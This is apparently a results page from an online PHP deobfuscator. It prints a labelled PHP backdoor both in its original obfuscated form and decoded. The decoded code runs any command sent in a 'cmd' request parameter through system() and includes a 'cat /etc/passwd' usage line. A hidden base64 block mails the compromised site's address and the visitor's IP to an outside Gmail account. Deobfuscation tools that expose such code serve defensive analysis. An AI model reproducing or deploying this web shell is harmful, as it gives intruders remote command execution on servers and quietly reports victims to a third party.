Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000..

Decoded Output download

echo '<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

';
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
$GLOBALS['IIIIIIIIIIIl']($cmd);
echo "</pre>";
die;
}
$IIIIIIIIIII1 = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsKaWYgKCR2aXNpdGMgPT0gIiIpIHsKICAkdmlzaXRjICA9IDA7CiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKICAkd2ViICAgICA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsKICAkaW5qICAgICA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOwogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7CiAgJGp1ZHVsICAgPSAiMTc4LUJsYWNrIGh0dHA6Ly8kdGFyZ2V0IGJ5ICR2aXNpdG9yIjsKICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkdXNlciAtICRhdXRoX3Bhc3MiOwogIGlmICghZW1wdHkoJHdlYikpIHsgQG1haWwoImhhcmR3YXJlaGVhdmVuLmNvbUBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSwkdXNlciwkYXV0aF9wYXNzKTsgfQp9CmVsc2UgeyAkdmlzaXRjKys7IH0KQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTs=";
eval($GLOBALS['IIIIIIIIIIlI']($IIIIIIIIIII1));
;echo '
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->';;

Did this file decode correctly?

Original Code

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};?><?php eval($GLOBALS['OOO0000O0']('JElJSUlJSUlJSUlsST0nYmFzZTY0X2RlY29kZSc7JElJSUlJSUlJSUlJbD0nc3lzdGVtJzs=')); ?><?php /* [email protected] */$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x554;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTExKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdhM21MZS84SVdRNFpyZjl3YmNWcDI3RW82SFlYU3N1akNKTU5La1AweFRSMXlkaDVCQWx2RFUrcUdpRm5PZ3R6PScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>gSdgpKDo\}SUr]DQegwrL3wrL3wrLUvsIQjSP7BX8/NHVC0oUg8V2A/oUO0ZmW0WMGKpDgwreOBpvaBZMW0WMBKpDgwrLaBreOB4mcwpDOBrLaBreOxQeOBpvaBpDOBrmCKpvaBreOBpvaBZmcwpvaBpvaBrLaTZmsJr+UrHVOGV7scf/TlHNkq6PfESLWqcEO+V/k62qfUYKf4p2iZYUaBu/cVrokKYL7mbEA+c/21S2sTcPiwHqcFwVSyQD/mbDc/cKsWV2TZpeU9pU3c2kf277HoE/kY6EQNH87PH+JTYPdyXEi5SI/lSqcUs0sGuoxBrpWvfL2+fvCi4lO04VKT9+HNX8gvHVCKpvaBreOBpvaB4pdksP/y4mcwpvaBpvaBpvaT9B==HEfxXla0wmedZV3pYEUBX82C2eJbW8QJ6+dKX+glW8QiWecZWmJxsIcB9MO5XEkNY8/kX8cJsli5SPSTWmDdwCD4Lbx09BTTHMJTSqfksmCKoUQ/277/2UcXQ+fdHmss4VknmP7NY8OCWNABSP2tWNy4Q8fdHmagWmCKoUQ/277/2UcXQ+fdHmss4py4QesrpDQ3p/fXQDkQV2kQV2kQV2kQXmss4mcNXEbT9BTk6+J5WmWOZq3lHpGM9BTKYE2nm0D4QekQV2kQV2kQV2kQrVagWmQ4V/TB6vQyr/kibpkQbUQP2pai2/rBXeHou2xl67J9S8cWpEk67IfZ67sHHDdL2NQJEeiBHesfHU32r8sQY2kBV2JvVDkLbEdKXEAF67JVYKkLbpkQceeqb+k3HDTWE03NrPBB6NfQHU3pbEd6r2i87EAYck7yS+k7YUH97L/VckCBcK7VcKkTE/cvVDkLbEdKrkHTV2f3HDkLbpkQbUQP7p3E2UH17kfou2TQ7KHV27CBY/37r7/TE/cvVDkLbEdJ7v7AV2f3HDkLbpkQbUQP7p3E2UH17kfou2Tp2kH87kQEpk76r7Hp2Uf4HegqX+sQbUWBE7J4XkT62EsQcL306+U8r+c6V0fYcUHR6NQVXedL2NfY7DkUVKsysE/TYvsLY2/0VKsBr7TW70fQbD/02/f3Y2U26vcr72TvE7s9SKkIYL3KVee+pIKGY+cIc0kYrk6BV2s4f2kL2NQJEeiBHeSiu2kRSDdQbD/1EEDiY+7pbEsQbDeiV2f4b+co6vHQbUWBE7J4XkT62EsHXPd0VKJYS8rlXL3MrDk0p/f3Y+c6pPANY2/DV2fVY8c62Pg6rDQx6vffY2gqX+sQc+AdV2f0Y/TorosKV8d5VKJKX/kTYq3QVIf022SAY8/os+gQXEJx6+UVrUk6VPAJcUHxH8UEs2Adp0HM72Qh6ks8S8QLfETMrN3TpefVSEco2N/Mbqs1EEDiY+7ps+dKEeiy6+kqYUk67N3JcNkqE7J9uKd2S+sP2oaib+UES+rl7Esku2/1H8UyuP/62PTZuorqV2CBVU/WpPAKcDi+6NQDS/TpH+kKXEAF67JVfKkTs+dKXEAF67JVYKd2SvDM9BTksP/y4mcIpegmb2ApElsQV2kQV2kQV2kQXeK0oVCKV2kQV2kQV2kQV2KA4VKnmNdk6+J5WmSfmk7v6Esk9M3xsIcB9MO5s8/lH+7DZPf5XVgvYEUBX82d6P/NY+c5XqWhS8JBw+fdHLUN6ob1Z+7D6lgB6ofvs+bfmCD4wmedZVaCWm3xsIcB9MO5XEkNY8/kX8cJsli5SPSCWmalrLa+WmaCWmDdwMSn9B==MiaGVPb^LFlkG\OQgGp

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 4

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O000O0O fgetc
$O0O00OO00 fread
$OO00O0000 1364
$OO00O00O0 echo '<!-- Simple PHP backdoor by DK (http://michaeldaw.org)..
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php
$IIIIIIIIIIIl system
$IIIIIIIIIIlI base64_decode

Stats

MD5 e921e31a46109ac9f97292c90e689e54
Eval Count 4
Decode Time 133 ms